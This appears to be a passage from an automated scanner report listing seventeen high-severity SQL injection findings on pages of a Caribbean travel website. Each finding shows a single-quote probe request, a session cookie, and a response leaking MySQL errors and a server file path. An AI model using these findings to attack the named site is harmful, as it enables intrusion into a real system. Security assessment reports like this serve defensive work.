
Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Dominican%20Republic%20Resort%20holidays/302

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Dominican%20Republic%20Resort%20holidays/302' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:30 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.94. http://www.caribbean-ocean.com/luxury%20Dutch%20Antilles%20Resort%20holidays/177 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Dutch%20Antilles%20Resort%20holidays/177

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Dutch%20Antilles%20Resort%20holidays/177' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:35 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.95. http://www.caribbean-ocean.com/luxury%20Grenada%20Resort%20holidays/107 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Grenada%20Resort%20holidays/107

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Grenada%20Resort%20holidays/107' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:36 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.96. http://www.caribbean-ocean.com/luxury%20Guadeloupe%20holidays/303 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Guadeloupe%20holidays/303

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Guadeloupe%20holidays/303' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:38 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.97. http://www.caribbean-ocean.com/luxury%20Haiti%20holidays/301 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Haiti%20holidays/301

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Haiti%20holidays/301' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:44 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.98. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Jamaica%20Resort%20holidays/105

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Jamaica%20Resort%20holidays/105' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:53 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.99. http://www.caribbean-ocean.com/luxury%20Maldives%20Hotel%20holidays/12 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Maldives%20Hotel%20holidays/12

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Maldives%20Hotel%20holidays/12' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:01 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6887
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.100. http://www.caribbean-ocean.com/luxury%20Martinique%20Hotel%20holidays/304 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Martinique%20Hotel%20holidays/304

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Martinique%20Hotel%20holidays/304' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:05 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.101. http://www.caribbean-ocean.com/luxury%20Montserrat%20Hotel%20holidays/309 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Montserrat%20Hotel%20holidays/309

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Montserrat%20Hotel%20holidays/309' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:06 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.102. http://www.caribbean-ocean.com/luxury%20Saba%20holidays/312 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Saba%20holidays/312

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Saba%20holidays/312' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:07 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.103. http://www.caribbean-ocean.com/luxury%20Saint%20Barthelemy%20holidays/310 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Saint%20Barthelemy%20holidays/310

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Saint%20Barthelemy%20holidays/310' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:10 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.104. http://www.caribbean-ocean.com/luxury%20Saint%20Eustatius%20holidays/311 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Saint%20Eustatius%20holidays/311

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Saint%20Eustatius%20holidays/311' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:10 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.105. http://www.caribbean-ocean.com/luxury%20Saint%20Lucia%20Hotel%20holidays/99 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Saint%20Lucia%20Hotel%20holidays/99

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Saint%20Lucia%20Hotel%20holidays/99' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:13 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6887
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.106. http://www.caribbean-ocean.com/luxury%20St%20Barths%20Hotel%20holidays/113 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20St%20Barths%20Hotel%20holidays/113

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20St%20Barths%20Hotel%20holidays/113' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:15 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.107. http://www.caribbean-ocean.com/luxury%20St%20Kitts%20and%20Nevis%20holidays/110 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20St%20Kitts%20and%20Nevis%20holidays/110

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20St%20Kitts%20and%20Nevis%20holidays/110' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:23 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.108. http://www.caribbean-ocean.com/luxury%20St%20Martin%20Hotel%20holidays/255 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20St%20Martin%20Hotel%20holidays/255

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20St%20Martin%20Hotel%20holidays/255' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:25 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.109. http://www.caribbean-ocean.com/luxury%20St%20Vincent%20and%20the%20Grenadines%20holidays/109 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20St%20Vincent%20and%20the%20Grenadines%20holidays/109

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20St%20Vincent%20and%20the%20Grenadines%20holidays/109' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:29 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.110. http://www.caribbean-ocean.com/luxury%20Tobago%20Resort%20holidays/104 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Tobago%20Resort%20holidays/104

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Tobago%20Resort%20holidays/104' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:29 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.111. http://www.caribbean-ocean.com/luxury%20US%20Virgin%20Islands%20Resort%20holidays/288 [REST URL parameter 2]

